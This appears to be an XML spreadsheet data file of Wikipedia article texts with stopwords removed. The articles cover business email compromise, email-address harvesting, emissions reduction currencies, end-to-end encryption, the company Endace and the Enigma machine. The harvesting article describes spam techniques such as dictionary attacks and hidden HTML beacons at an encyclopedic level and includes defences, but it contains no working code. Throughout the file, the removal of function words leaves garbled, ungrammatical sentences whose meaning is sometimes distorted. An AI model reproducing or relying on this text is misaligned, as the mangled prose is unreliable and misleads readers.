often social engineering trick victim making money transfers bank account fraudster.the worldwide financial impact large. united states' federal bureau investigation recorded billion international losses associated attacks june 2016 july 2019. incidents dublin lost €130,000 scam 2017 total €500,000 taken, though recovered. austrian aerospace firm facc defrauded million euros ($47 million) attack february 2016 subsequently fired ceo. wananga aotearoa zealand defrauded $120,000 (nzd). zealand fire service scammed $52,000 2015. ubiquiti networks lost $46.7 million scam 2015. save children victim million cyberscam 2017. australian organisations reported business email compromise attacks australian competition consumer commission suffered approximately $2,800,000 (aud) financial losses 2018 year. 2013, evaldas rimasauskas employees sent thousands fraud emails access companies email systems. also chain letter letter written succession group people computer virus computer program modifies programs replicate spread computer worm self-replicating malware program cyber-security regulation cybercrime term online crime domain name#domain name spoofing identification string internet compromised dmarc system prevent email fraud email authentication techniques aimed providing verifiable information origin email messages hoax deliberately fabricated falsehood masquerading truth spamming technique sends unsolicited e-mails using spoofed sender data phishing attempt trick person revealing information prank call call intended prank person answers social engineering (security) psychological manipulation people performing actions divulging confidential information website spoofing creating website, hoax, intention misleading readers references external links "2002 tech tip: spoofed/forged email". digital library. carnegie mellon university. 2002-01-01. retrieved 2019-12-19.</t>
  </si>
  <si>
    <t>Email-address harvesting</t>
  </si>
  <si>
    <t>email harvesting scraping process obtaining lists email addresses using various methods. typically used bulk email spam. methods simplest method involves spammers purchasing trading lists email addresses spammers. another common method special software known "harvesting bots" "harvesters", spider pages, postings usenet, mailing list archives, internet forums online sources obtain email addresses public data. spammers also form dictionary attack order harvest email addresses, known directory harvest attack, valid email addresses specific domain found guessing email address using common usernames email addresses domain. example, trying alan@example.com, alana@example.com, alanb@example.com, etc. accepted delivery recipient email server, instead rejected, added list theoretically valid email addresses domain. another method email address harvesting offer product service free charge long user provides valid email address, addresses collected users spam targets. common products services offered jokes day, daily bible quotes, news stock alerts, free merchandise, even registered offender alerts one's area. another technique used late 2007 company idate, used email harvesting directed subscribers quechup website spam victim's friends contacts. harvesting sources spammers harvest email addresses number sources. popular method uses email addresses owners published purposes. usenet posts, especially archives google groups, frequently yield addresses. simply searching pages addresses corporate staff directories membership lists professional societies using spambots yield thousands addresses, deliverable. spammers also subscribed discussion mailing lists purpose gathering addresses posters. whois systems require publication technical contact information internet domains; spammers illegally trawled resources email addresses. spammers also concluded generally, domain names businesses, email addresses follow basic pattern thus able accurately guess email addresses employees whose addresses harvested. many spammers programs called spiders find email addresses pages. usenet article message-ids often look enough like email addresses harvested well. spammers also harvested email addresses directly google search results, without actually spidering websites found search. spammer viruses include function scans victimized computer's disk drives (and possibly network interfaces) email addresses. these scanners discover email addresses never exposed whois. compromised computer located shared network segment capture email addresses traffic addressed network neighbors. harvested addresses returned spammer bot-net created virus. addition, sometime addresses appended information cross referenced extract financial personal data. recent, controversial tactic, called "e-pending", involves appending email addresses direct-marketing databases. direct marketers normally obtain lists prospects sources magazine subscriptions customer lists. searching resources email addresses corresponding names street addresses records, direct marketers send targeted spam email. however, spammer "targeting", imprecise; users reported, instance, receiving solicitations mortgage house specific street address address clearly business address including mail stop office number. spammers sometimes various means confirm addresses deliverable. instance, including hidden spam message written html cause recipient's mail client transmit recipient's address, unique key, spammer's site. users defend abuses turning mail program's option display images, reading email plain-text rather formatted. likewise, spammers sometimes operate pages purport remove submitted addresses spam lists. several cases, found subscribe entered addresses receive spam.when persons fill form, often sold spammer using service http post transfer data. this immediate drop email various spammer databases. revenue made spammer shared source. instance, someone applies online mortgage, owner site made deal spammer sell address. these considered best emails spammers, fresh user signed product service often marketed spam. legality many jurisdictions anti-spam laws place restrict harvesting email addresses. australia, creation email-address harvesting programs (address harvesting software) illegal, according 2003 anti-spam legislation, intended email-address harvesting programs send unsolicited commercial email. legislation intended prohibit emails australian connection' spam originating australia sent elsewhere, spam sent australian address. zealand similar restrictions contained unsolicited electronic messages 2007. united states america, can-spam 2003 made illegal initiate commercial email recipient email address recipient obtained using automated means generates possible electronic mail addresses combining names, letters, numbers numerous permutations. using automated means extract electronic mail addresses internet website proprietary online service operated another person, website online service included, time address obtained, notice stating operator website online service give, sell, otherwise transfer addresses maintained website online service party purposes initiating, enabling others initiate, electronic mail messages.furthermore, website operators distribute legitimately collected lists. can-spam 2003 requires operators sites online services include notice site service give, sell, otherwise transfer addresses, maintained website online service, party purposes initiating, enabling others initiate, electronic mail messages. countermeasures address munging address munging—e.g., changing "bob@example.com" "bob example com"—is common technique make harvesting email addresses difficult. though relatively easy overcome—see, e.g., google search—it still effective. somewhat inconvenient users, must examine address manually correct it.images using images display part email address effective harvesting countermeasure. processing required automatically extract text images economically viable spammers. inconvenient users, type address manually.contact forms email contact forms send email reveal recipient's address avoid publishing email address first place. however, method prevents users composing preferred email client, limits message content plain text automatically leave user record they've said "sent" mail folder.javascript obfuscation javascript email obfuscation produces normal, clickable email link users obscuring address spiders. source code seen harvesters, email address scrambled, encoded, otherwise obfuscated. while convenient users, reduce accessibility, e.g. text-based browsers screen readers, using javascript-enabled browser.html obfuscation html, email addresses obfuscated many ways, inserting hidden elements within address listing parts order using restore correct order. each benefit transparent users, none support clickable email links none accessible text-based browsers screen readers.captcha requiring users complete captcha giving email address effective harvesting countermeasure. popular solution recaptcha mailhide service. (note, 12.9.18: mailhide longer supported.)can-spam notice enable prosecution spammers can-spam 2003, website operator must post notice "the site service give, sell, otherwise transfer addresses maintained website online service party purposes initiating, enabling others initiate, electronic mail messages."mail server monitoring email servers variety methods combat directory harvesting attacks, including refuse communicate remote senders specified invalid recipient address within short time, measures carry risk legitimate email disrupted.spider traps spider trap part website honeypot designed combat email harvesting spiders. well-behaved spiders unaffected, website's robots.txt file warn spiders stay away area—a warning malicious spiders heed. some traps block access client's soon trap accessed. others, like network tarpit, designed waste time resources malicious spiders slowly endlessly feeding spider useless information. "bait" content contain large numbers fake addresses, technique known list poisoning; though consider practice harmful. also anti-spam techniques email spam crawler scraping references</t>
  </si>
  <si>
    <t>Emissions Reduction Currency System</t>
  </si>
  <si>
    <t>emissions reduction currency systems (ercs) schemes provide positive economic social reward reductions greenhouse emissions, either distribution redistribution national currency publishing coupons, reward points, local currency, complementary currency. compared emissions reductions instruments emissions reduction currency different emissions credit. value emissions credit determined national emissions degree credit confers right pollute. ultimate value emissions credit realised surrendered avoid punitive fines emitting. emissions reduction currency also different voluntary carbon offset payment made, typically fund alternative energy reforestation, emissions reduction sequestration resulting used reduce cancel payers responsibility emissions produced themselves. value offset held purchaser applies period purpose offset applies. emissions reduction currency, contrast, purely incentive behaviour change individuals groups. currency creates additional economic benefit emissions reductions separate cost imposed national emissions caps voluntary cost assumed purchaser voluntary offset. emissions reduction currencies exchangeable within national trade systems confer right pollute. while emissions reduction currency system achieved scale emissions crediting systems, number small scale schemes operation addition number approaches currently hypothetical promoted number organisations, academic institutions think tanks. emissions reduction currency systems conceptually inclusive carbon currency systems also include schemes reduce emissions incidental ways waste reduction community education. history idea global wealth system based alternative energy production first suggested buckminster fuller 1969 book operating manual spaceship earth. this idea piloted garry davis distributed "kilowatt dollars" 1992 earth summit held janeiro. edgar kempers hilton launched kiwah (kilowatt hour) currency copenhagen climate summit 2009. categories emissions reduction currency systems emission reduction currency systems designated belonging five categories: carbon title schemes introduction sustainable land management practices tropical rainforest high carbon environments lead abatement emissions land clearing might otherwise occurred additional sequestration. land purchased managed purposes used create independently tradeable carbon right, recognised within emissions credit scheme. example, aboveground biomass resulting land changes currently converted recognised emissions credits kyoto protocol clean development mechanism (cdm). increases soil carbon reasons reforestation either changes land management practices burial biochar currently included emissions credit systems cdm.these certificates legal title traded form currency independently offset, yielding additional economic benefits. this suggested carbon currency foundation.another emissions reduction currency system proposed basis eco, project next nature initiative eindhoven university technology netherlands. promotional discount schemes emissions reduction currency system based promotional discount participants rewarded reducing emissions gaining points redeemed discounts businesses advertising system. recyclebank scheme participants weigh recycled materials specially designed disposal bins identify scales embedded garbage collection vehicles. recyclebank also funded municipal governments purchase operate required equipment, allowing recyclebank operate private profit company. another similar scheme greenops llc, community-based recycling rewards program founded eco-entrepreneur anthony zolezzi, later sold waste management, becoming greenopolis recycling rewards. greenopolis gave rewards points users 2008 2012 social media websites, facebook games bottle recycling pepsico dream machines. dream machines placed college campuses, grocery stores military bases across collected million plastic bottles first year use. oceanopolis, facebook game created greenopolis make recycling habit engaging, recognized gore 2011 games change festival york university, saying "i've encouraged recent developments like trash tycoon oceanopolis, spurred thinking area." eventually, recyclebank greenopolis would merge following investment recyclebank waste management. 2019, recyclebank purchased recycle track systems (rts).earthaid uses specialised software publishes utility bills companies online format participants share family friends. reduced energy consumption earns reward points redeemed prizes businesses earthaid rewards network. allocation schemes emissions currency reduction system based allocation individual participants awarded equal allotment emissions currency. participants trade goods services another obtain enough currency cover actual emissions. objective allocation scheme obtain social parity participants regards emissions reductions. technically emissions crediting scheme, allocation scheme classed emissions reduction currency system trading currency individuals parity sought create secondary market trading currency medium exchange, trading creates additional positive economic value associated emissions reductions. global resource bank organisation advocating global allocation scheme. emissions rationing schemes otherwise known personal carbon trading, emissions reduction currency system based rationing presumes standard ration emissions allowable average citizen incrementally decreases time. participants using less rationed amount receive currency traded emitting allowed amount. participants pledge total remain average positive value scheme. carbon rationing action groups (crags), started united kingdom, global network groups. crag participants standard average country basis rationed amount. participants emitting rationed levels must national currency.norfolk island, australia process implementing island-wide voluntary personal carbon trading scheme designed southern cross university professor garry egger, community based currency schemes community based emissions reduction currency scheme type local currency local currency issues backed emissions reductions schemes members. local currency, accepted trade members local businesses, thereby rewards participants efforts global warming prevention. these currencies various degrees convertibility carbon saved, renewable energy, national currency. edogawatt form emissions reduction currency used edogawa, tokyo initiative local jōdo shinshū jukou-in temple. scheme, temple devotees purchase solar panels sell excess power tokyo electric power company. temple takes difference price paid tokyo electric power company price paid natural energy germany sells green power certificates fund raiser temple. purchasers green power certificates given edogawatt bills certificate. "these currently used among people certificate debt obligation exchange baby-sitting, carrying loads, translating small jobs. they provided incentive creation mutual society within community would like make tool deepening interpersonal relationships trust."http://www.qoin.org/what-we-do/past-projects/kyoto4all/ kyoto4all 2006 report written peter luttervelt, david beatty edgar kampers dutch ministry environment (then named vrom). study described series monetary models connect citizens-consumers climate change targets post-kyoto period. maia maia emissions reduction currency system, scheme developed western australia. system currency known "boya", named indigenous nyungar people's word rock trading tokens used them. each boya based kilograms carbon dioxide equivalent global warming prevention equates $100 tonne co2e social cost carbon, approximates middle estimate peer reviewed studies. first issue boya occurred january 2011 fremantle, western australia event hosted international permaculture service gaia foundation western australia. other issuers boya include university vermont australia, primary schools, non-profit organisations, neighbourhood association. liquidity network, initiative foundation economics sustainability proposing introduce community emissions reduction currency county kilkenny ireland. proposal currently council consideration. german climate protection association saveclimate.earth proposing introduce initially european base climate currency (earth carbon obligation) complementary currency individual greenhouse emissions consumption. monetizing schemes monetised emissions reduction currency backed financial value emissions credits certified regulatory scheme financial products derived them. these credits converted fiat currency transferring ownership underlying assets selling emission credits trade markets. virtual currency issued culture social media network. value determined financial markets basket currencies commodities. categorised emissions reduction currency carbon futures included commodities used value currency. carbon manna proposed scheme proceeds pre-selling credits bundled emissions reduction projects reimburse users directly enroll successful mobile phone currency m-pesa used developing countries reduce monetary transaction costs hedge currency fluctuations. also nori token notes</t>
  </si>
  <si>
    <t>End-to-end encryption</t>
  </si>
  <si>
    <t>end-to-end encryption (e2ee) system communication communicating users read messages. principle, prevents potential eavesdroppers including telecom providers, internet providers, malicious actors, even provider communication service able access cryptographic keys needed decrypt conversation.end-to-end encryption intended prevent data read secretly modified, true sender recipient(s). messages encrypted sender third party means decrypt them, stores encrypted. recipients retrieve encrypted data decrypt themselves. because third parties decipher data communicated stored, example, companies provide end-to-end encryption unable hand texts customers' messages authorities.in 2022, uk's information commissioner's office, government body responsible enforcing online data standards, stated opposition e2ee misinformed debate unbalanced, little focus benefits, since e2ee "helped keep children safe online" enforcement access stored data servers "not way" find abusers. e2ee privacy many messaging systems, including email many chat networks, messages pass intermediaries stored third party, retrieved recipient. even messages encrypted, encrypted transit', thus accessible service provider, regardless whether server-side disk encryption used. server-side disk encryption simply prevents unauthorized users viewing information. prevent company viewing information, simply decrypt data. this allows third party provide search features, scan illegal unacceptable content, also means read misused anyone access stored messages third-party system, whether design backdoor. this seen concern many cases privacy important, businesses whose reputation depends ability protect third party data, negotiations communications important enough risk targeted 'hacking' surveillance, sensitive subjects health, information minors involved. important note e2ee alone guarantee privacy security. example, data held unencrypted user's device, accessible app, login compromised. etymology term term "end-to-end encryption" originally meant communication never decrypted transport sender receiver. example, around 2003, e2ee proposed additional layer encryption tetra, addition existing radio encryption protecting communication mobile device network infrastructure. this standardised sfpg tetra. note tetra e2ee, keys generated management centre (kmc) management facility (kmf), communicating users.later, around 2014, meaning "end-to-end encryption" started evolve whatsapp encrypted portion network, requiring communication stays encrypted transport, also provider communication service able decrypt communications either access private key, capability undetectably inject adversarial public part man-in-the-middle attack. this meaning widely accepted one. modern usage 2016, typical server-based communications systems include end-to-end encryption. these systems guarantee protection communications clients servers, meaning users trust third parties running servers sensitive content. end-to-end encryption regarded safer reduces number parties might able interfere break encryption. case instant messaging, users third-party client plugin implement end-to-end encryption scheme otherwise non-e2ee protocol.some non-e2ee systems, lavabit hushmail, described offering "end-to-end" encryption not. other systems, telegram google allo, criticized enabling end-to-end encryption default. telegram enable end-to-end encryption default voip calls users using desktop software version, problem fixed quickly. however, 2020, telegram still features end-to-end encryption default, end-to-end encryption group chats, end-to-end encryption desktop clients. some encrypted backup file sharing services provide client-side encryption. encryption offer referred end-to-end encryption, services meant sharing messages users. however, term "end-to-end encryption" sometimes incorrectly used describe client-side encryption. challenges man-in-the-middle attacks end-to-end encryption ensures data transferred securely endpoints. but, rather break encryption, eavesdropper impersonate message recipient (during exchange substituting public recipient's), messages encrypted known attacker. after decrypting message, snoop encrypt share actual recipient, public case asymmetric systems, send message avoid detection. this known man-in-the-middle attack (mitm). authentication most end-to-end encryption protocols include form endpoint authentication specifically prevent mitm attacks. example, could rely certification authorities trust. alternative technique generate cryptographic hashes (fingerprints) based communicating users’ public keys shared secret keys. parties compare fingerprints using outside (out-of-band) communication channel guarantees integrity authenticity communication (but necessarily secrecy), starting conversation. fingerprints match, theory, middle.when displayed human inspection, fingerprints usually form binary-to-text encoding. these strings formatted groups characters readability. some clients instead display natural language representation fingerprint. approach consists one-to-one mapping fingerprint blocks words, loss entropy. protocol choose display words user's native (system) language. this can, however, make cross-language comparisons prone errors.in order improve localization, protocols chosen display fingerprints base strings instead error prone hexadecimal natural language strings. example base fingerprint (called safety number signal security code whatsapp) would 37345 35585 86758 07668 05805 48714 98975 19432 47272 72741 60915 64451 other applications telegram, instead, encode fingerprints using emojis. modern messaging applications also display fingerprints codes users scan other's devices. endpoint security end-to-end encryption paradigm directly address risks communications endpoints themselves. each user's computer still hacked steal cryptographic create mitm attack) simply read recipients’ decrypted messages real time files. even perfectly encrypted communication pipe secure mailbox end. major attempts increase endpoint security isolate generation, storage cryptographic operations smart card google's project vault. however, since plaintext input output still visible host system, malware monitor conversations real time. robust approach isolate sensitive data fully gapped computer. recommended experts purpose: really trust life piece software, would probably something much less flashy gnupg, maybe, running isolated computer locked basement. however, bruce schneier points out, stuxnet developed israel successfully jumped reached natanz nuclear plant's network iran. deal exfiltration malware, approach split trusted computing base behind unidirectionally connected computers prevent either insertion malware, exfiltration sensitive data inserted malware. backdoors backdoor usually secret method bypassing normal authentication encryption computer system, product, embedded device, etc. companies also willingly unwillingly introduce backdoors software help subvert negotiation bypass encryption altogether. 2013, information leaked edward snowden showed skype backdoor allowed microsoft hand users' messages despite fact messages officially end-to-end encrypted.following terrorist attacks bernardino 2015 pensacola 2019, requested backdoors apple's iphone software. company, however, refused create backdoor government, citing concern tool could pose risk consumer's privacy. compliance regulatory requirements content inspection while e2ee offer privacy benefits make desirable consumer-grade services, many businesses balance benefits regulatory requirements. example, many organizations subject mandates require able decrypt communication employees employees third parties. this might needed archival purposes, inspection data loss prevention (dlp) systems, litigation-related ediscovery detection malware threats data streams. reason, enterprise-focused communications information protection systems might implement encryption ensures transmissions encrypted encryption terminated internal systems (on-premises cloud-based) access information inspection processing. also comparison instant messaging protocols comparison voip software secure voip software table overview voip clients offer end-to-end encryption diffie–hellman exchange end-to-end auditable voting systems point-to-point encryption references further reading ermoshina, ksenia; musiani, francesca; halpin, harry (september 2016). "end-to-end encrypted messaging protocols: overview" (pdf). bagnoli, franco; (eds.). internet science. insci 2016. florence, italy: springer. 244–254. doi:10.1007/978-3-319-45982-0_22. isbn 978-3-319-45982-0.</t>
  </si>
  <si>
    <t>Endace</t>
  </si>
  <si>
    <t>endace privately owned network monitoring company, based zealand founded 2001. provides network visibility network recording products large organizations. company listed london stock exchange 2005 delisted 2013 acquired emulex. 2016 endace spun emulex currently private company.in october 2016, intercept revealed endace clients intelligence agencies, including british gchq (known conducting massive surveillance network communications) moroccan dgst, likewise known mass surveillance citizens. background history endace founded project school computing mathematical sciences university waikato zealand. first cards designed university intended measure latency networks.in 2006, endace transitioned component manufacturer appliance manufacturer managed infrastructure provider. company sells network visibility fabrics, based range network recorders, large corporations government agencies. endace first zealand company list london's alternative investment market floated mid-june 2005 move without controversy. poor share price performance early years seeming failure attract broad enough shareholder base lent weight criticism endace focused initially developing local profile (via nzx) rather pushing overseas investment (via london aim). endace headquartered auckland, zealand, centre hamilton, zealand, offices australia, united states great britain. innovations project grew academic research waikato university. having found software measurements cells packets) unsatisfactory, reasons accuracy lack certainty packet loss, research group developing hardware generate better quality recordings. this hardware subsequent iterations introduced fundamental innovations: hardware timestamping hardware accounting packet loss. hardware timestamping conventionally, packet cell given timestamp host machine's kernel (i.e. software) kernel driver notified packet arrived. this approach results poor quality timestamps several reasons, among considerable latency jitter packet arriving network interface receipt kernel driver uncertainty caused interrupt coalescing wherein host interrupt signifies arrival several packets. such poor quality limits research usefully done network performance related fields. solve this, generates timestamps hardware close network interface possible. obviate latency, jitter problems caused interrupt coalescing, hardware capable much greater accuracy precision software-generated timestamps. precision comes freedom custom hardware assign many bits timestamp required accuracy assured reference external time source accurate nanoseconds. contrast, accuracy kernel clocks corrected internet) order milliseconds (about 100,000 times less accurate), depending conditions involved. produces timestamps fixed-point format fractional bits, giving potential precision {\displaystyle 2^{-32}} seconds picoseconds. actual precision offered varies particular model dag, oldest giving fractional bits nanoseconds) better precisions offered dags higher bandwidth networks.the timestamp derived free-running clock provided crystal oscillator accuracy crystals drift temperature age. dag's solution direct digital synthesis using pulse-per-second output many receivers provide reference clock. this mechanism described §5.5.3 stephen donnelly's thesis also describes detail pre-commercial models dag. crucially, academically significant contribution dag, ability external reference globally synchronised makes possible one-way time-of-flight measurements. this immense interest academic researchers packets flowing points internet neither guaranteed follow path direction guaranteed timing characteristics direction. outside academic world, timestamp accuracy commercial applications enforcement compliance markets financial instruments directive 2004. packet loss almost important timestamp accuracy guaranteeing 100% cell packet capture and, loss unavoidable, knowing packets lost where. "where" important because, analysing packet trace, important able compensate lost packets calculating inter-arrival times. most commercial nics keep count dropped packets, can't indicate packets lost. prepends header which, amongst things, indicates many packets dropped packet previously accepted packet. also engineered deliver recorded packets host greatest possible efficiency. that, together interstitial loss counter, makes appealing surveillance applications. interstitial loss counter also finds application forensics; prosecutor needs able prove record complete not, not. controversy surveillance october 2016, intercept published article showing endace customers include intelligence agencies, including gchq, canadian australian intelligence agencies, dgst (morocco’s domestic surveillance agency). edward snowden documents shown gchq installed massive surveillance network communications using over-sea cable europe north america. awards march 2020, endace received awards "most innovative", "best product" "hot company" categories cyber defense magazine infosec awards.also march 2020, endace awarded "grand trophy winner" winning several categories info security products guide global excellence awards. company awarded gold award "best security hardware", "most innovative security hardware year", "network security management", "critical infrastructure security" categories well silver award "best security solution" "network visibility, security testing" categories. references external links official website</t>
  </si>
  <si>
    <t>Enigma machine</t>
  </si>
  <si>
    <t>enigma machine cipher device developed used early- mid-20th century protect commercial, diplomatic, military communication. employed extensively nazi germany world branches german military. enigma machine considered secure used encipher top-secret messages.the enigma electromechanical rotor mechanism scrambles letters alphabet. typical use, person enters text enigma's keyboard another person writes lights keyboard illuminated press. plain text entered, illuminated letters ciphertext. entering ciphertext transforms back readable plaintext. rotor mechanism changes electrical connections keys lights keypress. security system depends machine settings generally changed daily, based secret lists distributed advance, settings changed message. receiving station would know exact settings employed transmitting station successfully decrypt message. while nazi germany introduced series improvements enigma years, hampered decryption efforts, prevent poland cracking machine early december 1932 reading messages prior war. poland's sharing achievements enabled western allies exploit enigma-enciphered messages major source intelligence. many commentators flow ultra communications intelligence decrypting enigma, lorenz, ciphers shortened substantially even altered outcome. history enigma machine invented german engineer arthur scherbius world this unknown 2003 paper karl leeuw found described detail scherbius' changes. german firm scherbius ritter, co-founded scherbius, patented ideas cipher machine 1918 began marketing finished product brand name enigma 1923, initially targeted commercial markets. early models used commercially early 1920s, adopted military government services several countries, notably nazi germany world ii.several different enigma models produced, german military models, plugboard, complex. japanese italian models also use. with adoption slightly modified form) german navy 1926 german army force soon after, name enigma became widely known military circles. pre-war german military planning emphasized fast, mobile forces tactics, later known blitzkrieg, depend radio communication command coordination. since adversaries would likely intercept radio signals, messages protected secure encipherment. compact easily portable, enigma machine filled need. breaking enigma around december 1932 marian rejewski, polish mathematician cryptologist polish cipher bureau, used theory permutations, flaws german military-message encipherment procedures, break message keys plugboard enigma machine. france's hans-thilo schmidt obtained access german cipher materials included daily keys used september october 1932. those keys included plugboard settings. french passed material poles, rejewski used material message traffic september october solve unknown rotor wiring. consequently polish mathematicians able build enigma machines, dubbed "enigma doubles". rejewski aided fellow mathematician-cryptologists jerzy różycki henryk zygalski, recruited rejewski poznań university, selected students' knowledge german language, since area held germany prior world polish cipher bureau developed techniques defeat plugboard find components daily key, enabled cipher bureau read german enigma messages starting january 1933. over time, german cryptographic procedures improved, cipher bureau developed techniques designed mechanical devices continue reading enigma traffic. part effort, poles exploited quirks rotors, compiled catalogues, built cyclometer (invented rejewski) help make catalogue 100,000 entries, invented produced zygalski sheets, built electromechanical cryptologic bomba (invented rejewski) search rotor settings. 1938 poles bomby (plural bomba), year germans added rotors, times many bomby would needed read traffic.on july 1939, pyry, south warsaw, poles initiated french british military intelligence representatives polish enigma-decryption techniques equipment, including zygalski sheets cryptologic bomb, promised delegation polish-reconstructed enigma (the devices soon delivered). september 1939, british military mission included colin gubbins vera atkins, went poland, intending evacuate cipher-breakers marian rejewski, jerzy różycki, henryk zygalski country. cryptologists, however, evacuated superiors romania, time polish-allied country. way, security reasons, polish cipher bureau personnel deliberately destroyed records equipment. from romania traveled france, resumed cryptological work, collaborating teletype british, began work decrypting german enigma messages, using polish equipment techniques.gordon welchman, became head bletchley park, written: "hut ultra would never gotten ground learned poles, nick time, details german military version commercial enigma machine, operating procedures use." polish transfer theory technology pyry formed crucial basis subsequent world british enigma-decryption effort bletchley park, welchman worked. during war, british cryptologists decrypted vast number messages enciphered enigma. intelligence gleaned source, codenamed "ultra" british, substantial allied effort.though enigma cryptographic weaknesses, practice german procedural flaws, operator mistakes, failure systematically introduce changes encipherment procedures, allied capture tables hardware that, war, enabled allied cryptologists succeed. design like rotor machines, enigma machine combination mechanical electrical subsystems. mechanical subsystem consists keyboard; rotating disks called rotors arranged adjacently along spindle; various stepping components turn least rotor press, series lamps, letter. these design features reason enigma machine originally referred rotor-based cipher machine intellectual inception 1915. electrical pathway electrical pathway route current travel. manipulating phenomenon enigma machine able scramble messages. mechanical parts forming varying electrical circuit. when pressed, rotors rotate spindle. sides rotors series electrical contacts that, rotation, line contacts rotors fixed wiring either spindle. when rotors properly aligned, keyboard connected unique electrical pathway series contacts internal wiring. current, typically battery, flows pressed key, newly configured circuits back again, ultimately lighting display lamp, shows output letter. example, encrypting message starting anx..., operator would first press key, lamp might light, would first letter ciphertext. operator would next press fashion, current flows battery depressed bi-directional keyboard switch plugboard (3). next, passes (unused instance, shown closed) plug entry wheel (4), wiring three (wehrmacht enigma) four (kriegsmarine abwehr variants) installed rotors (5), enters reflector (6). reflector returns current, entirely different path, back rotors entry wheel (4), proceeding plug connected cable plug "d", another bi-directional switch light appropriate lamp.the repeated changes electrical path enigma scrambler implement polyalphabetic substitution cipher provides enigma's security. diagram right shows electrical pathway changes depression, causes rotation least right-hand rotor. current passes rotors, back reflector, rotors again. greyed-out lines possible paths within rotor; hard-wired side rotor other. letter encrypts differently consecutive presses, first this right-hand rotor steps (rotates position) press, sending signal completely different route. eventually rotors step press. rotors rotors (alternatively wheels drums, walzen german) form heart enigma machine. each rotor disc approximately (3.9 diameter made ebonite bakelite brass, spring-loaded, electrical contact pins arranged circle face, face housing corresponding electrical contacts form circular plates. pins contacts represent alphabet typically letters a–z, assumed rest description. when rotors mounted side side spindle, pins rotor rest plate contacts neighbouring rotor, forming electrical connection. inside body rotor, wires connect side contact complex pattern. most rotors identified roman numerals, issued copy rotor instance, wired identically others. true special thin beta gamma rotors used naval variant. itself, rotor performs simple type encryption, simple substitution cipher. example, corresponding letter might wired contact letter opposite face, enigma's security comes using several rotors series (usually three four) regular stepping movement rotors, thus implementing polyalphabetic substitution cipher. each rotor possible starting positions placed enigma machine. after insertion, rotor turned correct position hand, using grooved finger-wheel protrudes internal enigma cover closed. order operator know rotor's position, alphabet tyre letter ring) attached outside rotor disc, characters (typically letters); visible window slot cover, thus indicating rotational position rotor. early models, alphabet ring fixed rotor disc. later improvement ability adjust alphabet ring relative rotor disc. position ring known ringstellung ("ring setting"), setting part initial setup needed prior operating session. modern terms part initialization vector. each rotor contains notches control rotor stepping. military variants, notches located alphabet ring. army force enigmas used several rotors, initially three. december 1938, changed five, three chosen given session. rotors marked roman numerals distinguish them: iii, single notches located different points alphabet ring. this variation probably intended security measure, ultimately allowed polish clock method british banburismus attacks. naval version wehrmacht enigma always issued rotors services: first six, seven, finally eight. additional rotors marked viii, different wiring, notches, resulting frequent turnover. four-rotor naval enigma (m4) machine accommodated extra rotor space three-rotor version. this accomplished replacing original reflector thinner adding thin fourth rotor. that fourth rotor types, beta gamma, never stepped, could manually positions. made machine perform identically three-rotor machine. stepping avoid merely implementing simple (solvable) substitution cipher, every press caused rotors step twenty-sixth full rotation, electrical connections made. this changed substitution alphabet used encryption, ensuring cryptographic substitution different rotor position, producing formidable polyalphabetic substitution cipher. stepping mechanism varied slightly model model. right-hand rotor stepped keystroke, rotors stepped less frequently. turnover advancement rotor left-hand called turnover british. this achieved ratchet pawl mechanism. each rotor ratchet teeth every time pressed, spring-loaded pawls moved forward unison, trying engage ratchet. alphabet ring rotor right normally prevented this. ring rotated rotor, notch machined would eventually align pawl, allowing engage ratchet, advance rotor left. right-hand pawl, rotor ring right, stepped rotor every depression. single-notch rotor right-hand position, middle rotor stepped every steps right-hand rotor. similarly rotors three. two-notch rotor, rotor left would turn twice rotation. first five rotors introduced (i–v) contained notch each, additional naval rotors viii notches. position notch rotor determined letter ring could adjusted relation core containing interconnections. points rings caused next wheel move follows. design also included feature known double-stepping. this occurred pawl aligned ratchet rotor rotating notched ring neighbouring rotor. pawl engaged ratchet alignment notch, moved forward pushed ratchet notch, advancing rotors. three-rotor machine, double-stepping affected rotor only. moving forward, ratchet rotor three engaged, rotor would move subsequent keystroke, resulting consecutive steps. rotor also pushes rotor forward steps, since rotor moves forward every keystroke anyway, double-stepping. this double-stepping caused rotors deviate odometer-style regular motion. with three wheels single notches first second wheels, machine period 26×25×26 16,900 (not 26×26×26, double-stepping). historically, messages limited hundred letters, chance repeating combined rotor position single session, denying cryptanalysts valuable clues. make room naval fourth rotors, reflector made much thinner. fourth rotor fitted space made available. changes made, eased changeover. since three pawls, fourth rotor never stepped, could manually possible positions. device designed, implemented war's end, lückenfüllerwalze (gap-fill wheel) implemented irregular stepping. allowed field configuration notches positions. number notches relative prime number notches different wheel, stepping would unpredictable. like umkehrwalze-d also allowed internal wiring reconfigured. entry wheel current entry wheel (eintrittswalze german), entry stator, connects plugboard rotor assembly. plugboard present, entry wheel instead connects keyboard lampboard rotor assembly. while exact wiring used comparatively little importance security, proved obstacle rejewski's progress study rotor wirings. commercial enigma connects keys order sequence qwertz keyboard: q→a, w→b, military enigma connects straight alphabetical order: a→a, b→b, c→c, took inspired guesswork rejewski penetrate modification. reflector with exception models last rotor came 'reflector' (german: umkehrwalze, meaning 'reversal rotor'), patented feature unique enigma among period's various rotor machines. reflector connected outputs last rotor pairs, redirecting current back rotors different route. reflector ensured enigma would self-reciprocal; thus, identically configured machines, message could encrypted decrypted other, without need bulky mechanism switch encryption decryption modes. reflector allowed compact design, also gave enigma property letter ever encrypted itself. this severe cryptological flaw subsequently exploited codebreakers. model 'c', reflector could inserted different positions. model 'd', reflector could possible positions, although move encryption. abwehr enigma, reflector stepped encryption manner similar wheels. german army force enigma, reflector fixed rotate; four versions. original version marked 'a', replaced umkehrwalze november 1937. third version, umkehrwalze used briefly 1940, possibly mistake, solved fourth version, first observed january 1944, rewireable reflector, called umkehrwalze nick-named uncle dick british, allowing enigma operator alter connections part settings. plugboard plugboard (steckerbrett german) permitted variable wiring could reconfigured operator (visible front panel figure patch cords seen lid). introduced german army versions 1928, soon adopted reichsmarine (german navy). plugboard contributed cryptographic strength extra rotor, trillion possible settings (see below). enigma without plugboard (known unsteckered enigma) could solved relatively straightforwardly using hand methods; techniques generally defeated plugboard, driving allied cryptanalysts develop special machines solve cable placed onto plugboard connected letters pairs; example, might steckered pair. effect swap letters main rotor scrambling unit. example, operator pressed signal diverted entering rotors. steckered pairs might used time, although normally used. current flowed keyboard plugboard, proceeded entry-rotor eintrittswalze. each letter plugboard jacks. inserting plug disconnected upper jack (from keyboard) lower jack entry-rotor) letter. plug crosswired cable inserted another letter's jacks, thus switching connections letters. accessories other features made various enigma machines secure convenient. schreibmax some enigmas used schreibmax, small printer could print letters narrow paper ribbon. this eliminated 